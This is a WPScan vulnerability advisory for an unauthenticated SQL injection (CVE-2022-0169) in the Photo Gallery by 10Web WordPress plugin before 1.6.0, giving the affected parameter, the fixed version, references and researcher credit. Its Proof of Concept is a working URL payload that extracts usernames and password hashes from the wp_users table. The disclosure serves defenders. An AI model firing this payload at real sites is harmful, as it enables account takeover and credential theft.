WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Photo Gallery by 10Web < 1.6.0 - Unauthenticated SQL Injection

Description

The plugin does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(user_login,%200x2c,%20user_pass),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users%20--%20g

Affects Plugins

photo-gallery
Fixed in version 1.6.0

References

CVE
CVE-2022-0169
URL
https://plugins.trac.wordpress.org/changeset/2672822/photo-gallery#file9

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
0b4d870f-eab8-4544-91f8-9c5f0538709c

Timeline

Publicly Published

2022-02-15 (about 7 months ago)

Added

2022-02-15 (about 7 months ago)

Last Updated

2022-04-08 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin